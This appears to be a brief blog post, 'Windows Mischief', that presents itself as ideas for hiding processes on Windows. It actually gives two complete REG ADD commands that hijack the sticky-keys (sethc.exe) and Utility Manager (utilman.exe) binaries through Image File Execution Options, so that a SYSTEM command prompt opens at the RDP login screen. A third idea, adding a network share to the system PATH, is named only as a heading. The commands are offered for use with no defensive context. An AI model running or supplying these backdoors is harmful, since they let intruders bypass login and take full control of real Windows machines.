Windows Mischief

Ways to hide processes on Windows

1 minute read

Here are some of my ideas for hiding processes on a Windows system.

Registry Hijacks

Subvert sticky keys

Press F5 a bunch of times at an RDP login screen:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Subvert utility manager

Press Win+U at an RDP login screen:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Add a network share to system PATH

Unsorted